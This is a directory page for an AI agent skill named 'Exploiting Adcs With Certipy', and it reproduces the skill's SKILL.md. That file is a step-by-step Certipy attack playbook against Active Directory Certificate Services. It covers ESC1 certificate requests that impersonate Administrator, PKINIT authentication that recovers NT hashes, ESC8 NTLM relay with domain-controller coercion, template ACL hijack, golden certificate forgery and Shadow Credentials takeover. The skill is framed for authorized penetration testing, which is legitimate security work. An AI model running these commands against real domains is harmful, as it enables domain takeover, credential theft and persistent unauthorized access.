Agent skill

Exploiting Adcs With Certipy

by mukul975 in mukul975/Anthropic-Cybersecurity-Skills

Use Certipy to enumerate AD CS certificate authorities and templates over LDAP/RPC, then exploit ESC1-ESC16 misconfigurations - SAN abuse, NTLM relay to web enrollment (ESC8), Shadow Credentials…

Apache-2.0Auto-check passedSecurity

Install Exploiting Adcs With Certipy

skills CLI
$ npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill exploiting-adcs-with-certipy -a claude-code

Project install by default; add -g for ~/.claude/skills/.

GitHub CLI
$ gh skill install mukul975/Anthropic-Cybersecurity-Skills exploiting-adcs-with-certipy --agent claude-code

Project scope by default; add --scope user for a personal install. Needs GitHub CLI 2.90.0 or later (public preview).

Manual copy
$ git clone --depth 1 https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git skills-src && mkdir -p .claude/skills && cp -r skills-src/skills/exploiting-adcs-with-certipy .claude/skills/exploiting-adcs-with-certipy && rm -rf skills-src

Use ~/.claude/skills/ instead of .claude/skills for a personal install. The folder must contain SKILL.md.

Claude Code skills documentation · loads skills from .claude/skills/

Facts

Skill name
exploiting-adcs-with-certipy
GitHub stars
34k
Token cost
~2.7k tokens
SKILL.md length
963 words
Files
5 (incl. scripts, references)
Skills in repo
644
Repo updated
First seen
Licence
Apache-2.0

At a glance

Use Certipy to enumerate AD CS certificate authorities and templates over LDAP/RPC, then exploit ESC1-ESC16 misconfigurations - SAN abuse, NTLM relay to web enrollment (ESC8), Shadow Credentials…

  • Works in 7 steps: Enumerate AD CS with certipy find → Exploit ESC1 — Enrollee-Supplied Subject… → Authenticate with the certificate via… → …
  • Tasks that involve Penetration testing
  • SKILL.md covers Overview, When to Use, Prerequisites and Objectives, plus 5 more sections
  • Runs Python scripts from its folder; calls pipx and pip

What it does

Exploiting Adcs With Certipy is an agent skill from mukul975/Anthropic-Cybersecurity-Skills. Use Certipy to enumerate AD CS certificate authorities and templates over LDAP/RPC, then exploit ESC1-ESC16 misconfigurations - SAN abuse, NTLM relay to web enrollment (ESC8), Shadow Credentials, golden certificate forgery, and PKINIT/Schannel auth. Use during authorized penetration tests to escalate a domain foothold to Domain Admin, or to validate that certificate template ACLs and CA hardening detect these attacks.

Its SKILL.md is about 2.7k tokens, which your agent loads only when the skill is triggered. The skill folder holds 6 other files, including scripts and reference files (for example `references/api-reference.md`, `references/standards.md` and `scripts/agent.py`).

It sits in Security, covering Penetration testing. The repository describes itself as: 817 structured cybersecurity skills for AI agents · Mapped to 6 frameworks: MITRE ATT&CK, NIST CSF 2.0, MITRE ATLAS, D3FEND, NIST AI RMF & MITRE F3 (Fight Fraud) · agentskills.io…. The licence is Apache-2.0.

When your agent uses it

  • Tasks that involve Penetration testing

Example prompts

  • “/exploiting-adcs-with-certipy”

Requirements

  • Python 3

Workflow steps

7 steps, taken from the step headings in SKILL.md.

  1. Enumerate AD CS with certipy find
  2. Exploit ESC1 — Enrollee-Supplied Subject (SAN abuse)
  3. Authenticate with the certificate via certipy auth
  4. Exploit ESC8 — NTLM relay to AD CS Web Enrollment
  5. Exploit ESC4 — Template ACL hijack
  6. Forge a Golden Certificate (post-compromise persistence)
  7. Shadow Credentials shortcut

What it can do on your machine

Read from SKILL.md and the folder at commit 54a7988. It shows what the files ask for, not the result of running them.

  • Tool permissions

    Pre-approves nothing: there is no allowed-tools line, so your agent's usual permission prompts apply.

    From allowed-tools in the SKILL.md frontmatter.

  • Runs code

    Ships 1 file in scripts/ (Python), which the agent can run.

    Shell commands in SKILL.md call:

    • pipx
    • pip

    From the folder's file list and the shell code blocks in SKILL.md.

  • Network

    Links to these hosts (documentation or services it may open):

    • github.com
    • specterops.io
    • thehacker.recipes

    From URLs in SKILL.md, links to its own repository left out.

  • Credentials

    Names no API keys, tokens, secrets or passwords.

    From names ending in _API_KEY, _TOKEN, _SECRET, _KEY or _PASSWORD in SKILL.md.

Context cost

Exploiting Adcs With Certipy loads about 2.7k tokens when it runs, and up to ~3.8k if it reads all its reference files. Until then it costs about 113 tokens; SKILL.md has 963 words of instructions outside code blocks.

Always · name and description, kept in context so the agent knows when to use it
~113
When it runs · the whole SKILL.md, loaded when a task matches
~2.7k
With references · SKILL.md plus every file in references/, read only if the agent opens them
~3.8k

Estimates: characters ÷ 4, the usual rule of thumb; real counts depend on the model's tokenizer. Scripts and assets cost tokens only if the agent reads them.

Safety

Auto-check passed

The automated check found no risky patterns in SKILL.md.

Automated static check — not a guarantee. Review scripts before installing. It scans the text of SKILL.md for risky patterns (piping downloads into a shell, reading credential files, hidden Unicode, destructive commands); the scripts in this folder are not scanned.

SKILL.md

The full file from mukul975/Anthropic-Cybersecurity-Skills at commit 54a7988, republished under its Apache-2.0 licence (© mukul975). 963 words, ~2,659 tokens.

Download SKILL.mdSave it as .claude/skills/exploiting-adcs-with-certipy/SKILL.md (or your agent's skills folder). This skill also uses 4 other files; get the full folder from GitHub.
name
exploiting-adcs-with-certipy
description
Use Certipy to enumerate AD CS certificate authorities and templates over LDAP/RPC, then exploit ESC1-ESC16 misconfigurations - SAN abuse, NTLM relay to web enrollment (ESC8), Shadow Credentials, golden certificate forgery, and PKINIT/Schannel auth. Use during authorized penetration tests to escalate a domain foothold to Domain Admin, or to validate that certificate template ACLs and CA hardening detect these attacks.
domain
cybersecurity
subdomain
red-teaming
tags
red-team, active-directory, adcs, certipy, esc1, esc8, privilege-escalation, pkinit
version
1.0
author
mahipal
license
Apache-2.0
nist_csf
PR.AA-05
mitre_attack
T1649

Exploiting AD CS with Certipy

Legal Notice: This skill is for authorized security testing and educational purposes only. Active Directory Certificate Services attacks can result in full domain compromise. Run these techniques only against systems you own or have explicit written authorization to test. Unauthorized use is illegal under computer fraud statutes.

Overview

Active Directory Certificate Services (AD CS) is Microsoft's public-key infrastructure role used to issue certificates for authentication, encryption, and signing inside a Windows domain. SpecterOps researchers Will Schroeder and Lee Christensen documented a family of privilege-escalation primitives in their 2021 whitepaper Certified Pre-Owned, naming them ESC1 through ESC8. The community has since extended the catalog through ESC16. Because a certificate that maps to a privileged principal can be used for PKINIT Kerberos authentication, an attacker who obtains such a certificate can authenticate as a Domain Admin or Domain Controller without ever knowing the password — and the certificate remains valid even after a password reset.

Certipy (package certipy-ad, maintained by Oliver Lyak / ly4k) is the de-facto offensive toolkit for AD CS. It is a pure-Python tool that enumerates certificate authorities and templates over LDAP/RPC, requests and forges certificates, performs PKINIT/Schannel authentication, runs Shadow Credentials attacks, and relays coerced NTLM authentication into AD CS HTTP and RPC enrollment endpoints. Certipy supports detection and exploitation across the full ESC1-ESC16 range, making it the primary tool for AD CS assessment. Source: ly4k/Certipy and SpecterOps "Certified Pre-Owned".

When to Use

  • During internal penetration tests and red-team engagements where AD CS is in scope
  • When a low-privileged domain foothold needs a path to Domain Admin / Domain Controller
  • To validate that certificate template ACLs and CA configuration are hardened
  • When testing detection coverage for certificate-based privilege escalation
  • During purple-team exercises to generate ESC1/ESC8 telemetry for blue-team tuning

Prerequisites

  • Authorized engagement scope that explicitly includes AD CS exploitation
  • A foothold: valid domain credentials (password, NT hash, or Kerberos ticket) for any low-privileged user
  • Network reachability to a Domain Controller (LDAP/389, LDAPS/636) and the CA host
  • Python 3.10+ (Certipy 5.x requires Python 3.12+) and a Linux attack host
  • Install Certipy:
    bash
    # Recommended isolated install
    pipx install certipy-ad
    # Or with pip
    pip install certipy-ad
    # Verify
    certipy --version
  • For ESC8 relay you also need a coercion tool (Coercer/PetitPotam) and reachable victim machine accounts

Objectives

  • Enumerate every CA, template, and enrollment endpoint in the forest
  • Identify which ESC1-ESC16 misconfigurations are exploitable from the current principal
  • Request a certificate impersonating a privileged target (ESC1 SAN abuse)
  • Relay coerced authentication into AD CS web enrollment to obtain a DC certificate (ESC8)
  • Authenticate with a forged/issued certificate to recover a TGT and NT hash
  • Document each finding with evidence and remediation guidance

MITRE ATT&CK Mapping

IDTechniqueApplication in this skill
T1649Steal or Forge Authentication CertificatesRequesting, forging, and abusing AD CS certificates (ESC1-ESC16) to authenticate as privileged principals

Workflow

Step 1: Enumerate AD CS with certipy find

Collect CA and template configuration and flag vulnerable templates. find runs LDAP and RPC queries and produces JSON, a BloodHound-compatible ZIP, and a human-readable text report.

bash
# Full enumeration, only enabled templates, hide built-in admin ACEs
certipy find \
    -u 'attacker@corp.local' -p 'Passw0rd!' \
    -dc-ip 10.0.0.100 -text -enabled -hide-admins

# Output only templates Certipy considers vulnerable
certipy find \
    -u 'attacker@corp.local' -p 'Passw0rd!' \
    -dc-ip 10.0.0.100 -vulnerable -stdout

# Authenticate with an NT hash instead of a password
certipy find -u 'attacker@corp.local' -hashes ':fc525c9683e8fe067095ba2ddc971889' \
    -dc-ip 10.0.0.100 -vulnerable -stdout

Review the [!] Vulnerabilities block in the output. Each finding is labeled ESC1...ESC16 with the affected template/CA name.

Step 2: Exploit ESC1 — Enrollee-Supplied Subject (SAN abuse)

ESC1 templates let a low-privileged enrollee specify an arbitrary Subject Alternative Name and include the Client Authentication EKU. Request a certificate for a privileged UPN and pin the target SID (Certipy auto-adds the SID extension to satisfy the post-May-2022 strong-mapping patch).

bash
certipy req \
    -u 'attacker@corp.local' -p 'Passw0rd!' \
    -dc-ip 10.0.0.100 -target 'CA.CORP.LOCAL' \
    -ca 'CORP-CA' -template 'VulnUserTemplate' \
    -upn 'administrator@corp.local' \
    -sid 'S-1-5-21-1111111111-2222222222-3333333333-500'
# -> saves administrator.pfx
Step 3: Authenticate with the certificate via certipy auth

Use the issued PFX to perform PKINIT, obtain a TGT, and recover the target's NT hash.

bash
certipy auth -pfx administrator.pfx -dc-ip 10.0.0.100
# Output: a .ccache TGT and the recovered NT hash for administrator

If PKINIT is unavailable, fall back to Schannel/LDAP authentication:

bash
certipy auth -pfx administrator.pfx -dc-ip 10.0.0.100 -ldap-shell
Show full SKILL.md (376 more words)Show less
Step 4: Exploit ESC8 — NTLM relay to AD CS Web Enrollment

ESC8 abuses the AD CS web enrollment interface (/certsrv/) that accepts NTLM auth. Stand up Certipy's relay server targeting the CA's HTTP endpoint, then coerce a Domain Controller to authenticate to your relay (coercion covered in the Coercer skill).

bash
# Terminal 1: relay coerced auth into web enrollment, request a DC cert
certipy relay -target 'http://CA.CORP.LOCAL' -template 'DomainController'

# Terminal 2: coerce DC1 to authenticate to the relay host (10.0.0.50)
coercer coerce -u 'attacker' -p 'Passw0rd!' -d corp.local \
    -t 10.0.0.10 -l 10.0.0.50

Certipy writes a dc.pfx. Authenticate as the DC machine account and DCSync:

bash
certipy auth -pfx 'dc$.pfx' -dc-ip 10.0.0.100
Step 5: Exploit ESC4 — Template ACL hijack

If you hold write access over a template, temporarily reconfigure it into an ESC1-vulnerable state, exploit, then restore.

bash
# Make the template vulnerable (save the original config first)
certipy template -u 'attacker@corp.local' -p 'Passw0rd!' \
    -dc-ip 10.0.0.100 -template 'VulnTemplate' -write-default-configuration
# ... run Step 2 ESC1 request, then restore the saved configuration
Step 6: Forge a Golden Certificate (post-compromise persistence)

With access to the CA's private key (e.g., via backup), forge certificates for any principal offline.

bash
# Extract the CA certificate and private key from a compromised CA
certipy ca -backup -u 'admin@corp.local' -hashes :<nthash> \
    -ca 'CORP-CA' -dc-ip 10.0.0.100

# Forge a certificate for any user using the CA key
certipy forge -ca-pfx 'CORP-CA.pfx' \
    -upn 'administrator@corp.local' \
    -subject 'CN=Administrator,CN=Users,DC=corp,DC=local'
Step 7: Shadow Credentials shortcut

If you have write access to a target's msDS-KeyCredentialLink, Certipy can take over the account end-to-end (see the dedicated Shadow Credentials skill).

bash
certipy shadow auto -u 'attacker@corp.local' -p 'Passw0rd!' \
    -dc-ip 10.0.0.100 -account 'victim-dc$'

Tools and Resources

ResourcePurposeLink
Certipy (ly4k)Primary AD CS attack toolkithttps://github.com/ly4k/Certipy
Certipy WikiCommand reference and ESC explanationshttps://github.com/ly4k/Certipy/wiki
Certified Pre-Owned (SpecterOps)Original ESC1-ESC8 researchhttps://specterops.io/wp-content/uploads/sites/3/2022/06/Certified_Pre-Owned.pdf
The Hacker Recipes — AD CSAttack walkthroughshttps://www.thehacker.recipes/ad/movement/ad-cs
Impacket ntlmrelayxAlternative ESC8 relayhttps://github.com/fortra/impacket

ESC Vulnerability Reference

ESCMisconfiguration
ESC1Enrollee-supplied subject + Client Auth EKU on a low-priv template
ESC2Any Purpose / no EKU template usable as enrollment agent
ESC3Enrollment Agent template with loose enroll rights
ESC4Write access over a template (hijack into ESC1)
ESC5Weak ACLs on PKI objects (CA, NTAuthCertificates)
ESC6CA EDITF_ATTRIBUTESUBJECTALTNAME2 allows arbitrary SAN
ESC7Dangerous Manage CA / Manage Certificates permissions
ESC8NTLM relay to AD CS HTTP web enrollment
ESC9No security extension (szOID_NTDS_CA_SECURITY_EXT) on template
ESC10Weak certificate mapping registry settings
ESC11NTLM relay to AD CS RPC (ICertPassage) endpoint
ESC13Issuance policy linked to a privileged group (OID group link)
ESC15Application Policies abuse (CVE-2024-49019, "EKUwu")
ESC16Security extension disabled CA-wide

Validation Criteria

  • certipy find -vulnerable ran and produced a list of exploitable templates/CAs
  • At least one ESC misconfiguration confirmed with a successful certipy req
  • certipy auth returned a TGT and NT hash for the impersonated privileged account
  • ESC8 relay (if in scope) yielded a Domain Controller certificate
  • Any modified template (ESC4) was restored to its original configuration
  • Each finding documented with command output, affected object, and remediation
  • Issued certificates and PFX files securely handled and removed at engagement close

© mukul975, Apache-2.0. Rendered from Markdown: HTML in the file is shown as text, images as links, and headings moved down two levels. Raw file

Files

SKILL.md and 4 other files (scripts, references) in skills/exploiting-adcs-with-certipy of mukul975/Anthropic-Cybersecurity-Skills.

  • SKILL.md
  • LICENSE
  • references/api-reference.md
  • references/standards.md
  • scripts/agent.py

Open the folder on GitHubat commit 54a7988

Compare with similar skills

Exploiting Adcs With Certipy next to the 5 skills that share the most tags, products or categories with it. Stars are the repository's; “used in” counts other GitHub owners with a copy.

Exploiting Adcs With Certipy compared with similar skills
SkillStarsUsed inTokensAuto-checkLicenceRepo updated
Exploiting Adcs With Certipy this skillmukul975/Anthropic-Cybersecurity-Skills34k—~2.7kAutomated safety check: PassApache-2.0
Strix Code Vulnerability Scanusestrix/strix67k—~1.1kAutomated safety check: PassApache-2.0
Code Audit3stoneBrother/code-audit8921 repos~2.7kAutomated safety check: PassNone
Fix Strix Security Findingsusestrix/strix67k—~1.5kAutomated safety check: PassApache-2.0
Metabigor OSINT Reconj3ssie/metabigor1.8k—~2.4kAutomated safety check: PassMIT
Wooyun Legacytanweai/wooyun-legacy1.8k—~1.9kAutomated safety check: PassCustom licence

Similar skills

  • Runs a Strix white-box security review that reads the source, then exploits what it finds in a sandbox so each reported issue has a proof-of-concept.

    67k GitHub stars~1.1k tokensUpdated yesterday
    SecurityAuto-check passed
  • Code Audit

    3stoneBrother/code-audit

    Professional code security audit skill covering 55+ vulnerability types.

    892 GitHub starsUsed in 1 repo~2.7k tokens
    SecurityAuto-check passed
  • Triages findings from a Strix pentest by severity, fixes each root cause with a minimal change, and re-runs Strix to confirm the exploit no longer works.

    67k GitHub stars~1.5k tokensUpdated yesterday
    SecurityAuto-check passed
  • Metabigor OSINT Recon

    j3ssie/metabigor

    Operates the metabigor CLI to map a target's network ranges, subdomains, ports, related domains, CDNs and archived URLs from free sources without API keys.

    1.8k GitHub stars~2.4k tokensUpdated 2 mo ago
    SecurityAuto-check passed
  • Wooyun Legacy

    tanweai/wooyun-legacy

    WooYun business logic vulnerability methodology — 22,132 real cases across 6 domains (authentication bypass, authorization bypass, payment tampering, information disclosure, logic flaws…

    1.8k GitHub stars~1.9k tokensUpdated 2 mo ago
    SecurityAuto-check passed
  • Runs Strix's autonomous exploit agents against each OWASP Top 10:2025 category and the API Security Top 10, reporting only what could actually be proven with a proof-of-concept.

    67k GitHub stars~1.6k tokensUpdated yesterday
    SecurityAuto-check passed

More from mukul975/Anthropic-Cybersecurity-Skills

All 644 skills in this repo
  • Campaign Attribution Evidence Analysis

    mukul975/Anthropic-Cybersecurity-Skills

    Weighs infrastructure, TTP, malware code and timing evidence with the Diamond Model and competing hypotheses to reach a confidence-rated attribution.

    34k GitHub stars~2.3k tokensUpdated 1 mo ago
    Auto-check passed
  • Go Malware Analysis in Ghidra

    mukul975/Anthropic-Cybersecurity-Skills

    Walks through reverse engineering Go-compiled malware in Ghidra: parsing buildinfo and pclntab, recovering stripped function names and extracting dependencies.

    34k GitHub stars~2.8k tokensUpdated 1 mo ago
    Auto-check passed
  • LNK and Jump List Forensics

    mukul975/Anthropic-Cybersecurity-Skills

    Guides forensic analysis of Windows LNK shortcut files and Jump Lists with LECmd, JLECmd and manual parsing to show file access and program execution.

    34k GitHub stars~2.8k tokensUpdated 1 mo ago
    Auto-check passed
  • Malware Persistence Analysis with Autoruns

    mukul975/Anthropic-Cybersecurity-Skills

    Hunts Windows malware persistence with Sysinternals Autoruns, covering run keys, services, scheduled tasks and drivers, with baseline comparison.

    34k GitHub stars~1.2k tokensUpdated 1 mo ago
    Auto-check passed
  • NTFS MFT Deleted File Recovery

    mukul975/Anthropic-Cybersecurity-Skills

    Guides a Windows forensic examination of the NTFS Master File Table to recover deleted-file evidence, build timelines and spot timestomping.

    34k GitHub stars~2.7k tokensUpdated 1 mo ago
    Auto-check passed
  • Network Covert Channel Analysis

    mukul975/Anthropic-Cybersecurity-Skills

    Detects DNS tunneling, ICMP exfiltration and HTTP-based covert channels in packet captures and DNS logs when hunting for hidden command-and-control traffic.

    34k GitHub stars~2k tokensUpdated 1 mo ago
    Auto-check passed

Categories

Questions about Exploiting Adcs With Certipy

What does Exploiting Adcs With Certipy do?

Use Certipy to enumerate AD CS certificate authorities and templates over LDAP/RPC, then exploit ESC1-ESC16 misconfigurations - SAN abuse, NTLM relay to web enrollment (ESC8), Shadow Credentials…. Exploiting Adcs With Certipy is an agent skill from mukul975/Anthropic-Cybersecurity-Skills. Use Certipy to enumerate AD CS certificate authorities and templates over LDAP/RPC, then exploit ESC1-ESC16 misconfigurations - SAN abuse, NTLM relay to web enrollment (ESC8), Shadow Credentials, golden certificate forgery, and PKINIT/Schannel auth.

When should I use Exploiting Adcs With Certipy?

Exploiting Adcs With Certipy fits situations like: tasks that involve Penetration testing.

How do I install Exploiting Adcs With Certipy in Claude Code?

Run `npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill exploiting-adcs-with-certipy -a claude-code`. Or copy the skill folder (skills/exploiting-adcs-with-certipy in mukul975/Anthropic-Cybersecurity-Skills) into .claude/skills/exploiting-adcs-with-certipy in your project. Claude Code loads it when a task matches its description.

How do I install Exploiting Adcs With Certipy in Codex?

Run `npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill exploiting-adcs-with-certipy -a codex`. Or copy the skill folder (skills/exploiting-adcs-with-certipy in mukul975/Anthropic-Cybersecurity-Skills) into .agents/skills/exploiting-adcs-with-certipy in your project. Codex loads it when a task matches its description.

Can I use Exploiting Adcs With Certipy in Cursor, Gemini CLI or GitHub Copilot?

Cursor, Gemini CLI, GitHub Copilot and OpenCode also load SKILL.md folders. With the skills CLI, run `npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill exploiting-adcs-with-certipy -a cursor` (or -a gemini-cli, github-copilot or opencode for the others). To copy it by hand, put the folder in .cursor/skills/exploiting-adcs-with-certipy, .gemini/skills/exploiting-adcs-with-certipy, .github/skills/exploiting-adcs-with-certipy and .opencode/skills/exploiting-adcs-with-certipy in your project.

What does Exploiting Adcs With Certipy need to run?

Going by SKILL.md and its folder, Exploiting Adcs With Certipy needs Python for the scripts in its folder and the command-line tools its instructions call (pipx and pip). Our summary lists: Python 3.

Does Exploiting Adcs With Certipy access the network?

SKILL.md names 3 domains. As links in the text: github.com, specterops.io and thehacker.recipes. This is read from the text; nothing was executed.

Is Exploiting Adcs With Certipy safe to install?

Our automated static check of SKILL.md found no risky patterns, such as piping downloads into a shell, reading credential files or hidden Unicode. It is not a guarantee. The check reads SKILL.md only: the scripts in the folder are not scanned, so read them before running anything.

What licence does Exploiting Adcs With Certipy use?

Exploiting Adcs With Certipy is published under the Apache-2.0 licence (declared in SKILL.md). It allows redistribution, so the full SKILL.md is shown on this page.

How many tokens does Exploiting Adcs With Certipy use?

About 2.7k tokens (SKILL.md is roughly 11k characters). Agents keep only the skill's name and description in context until a task matches; then they load SKILL.md in full. Its references folder adds about 1.1k tokens, read only when the agent opens those files.

What are the alternatives to Exploiting Adcs With Certipy?

Skills that share tags, products or a category with Exploiting Adcs With Certipy: Strix Code Vulnerability Scan (usestrix/strix, 67k stars), Code Audit (3stoneBrother/code-audit, 892 stars), Fix Strix Security Findings (usestrix/strix, 67k stars) and Metabigor OSINT Recon (j3ssie/metabigor, 1.8k stars). The comparison table on this page puts their stars, adoption, token cost, safety result and licence side by side.

Who maintains Exploiting Adcs With Certipy?

mukul975 (a GitHub user) maintains it in mukul975/Anthropic-Cybersecurity-Skills, which has 33,993 GitHub stars. The repository holds 644 skills in this directory. The repository was last updated on August 31, 2026.

Source: mukul975/Anthropic-Cybersecurity-Skills on GitHub. Facts on this page come from the repository at the commit we read; the author's words are quoted as theirs.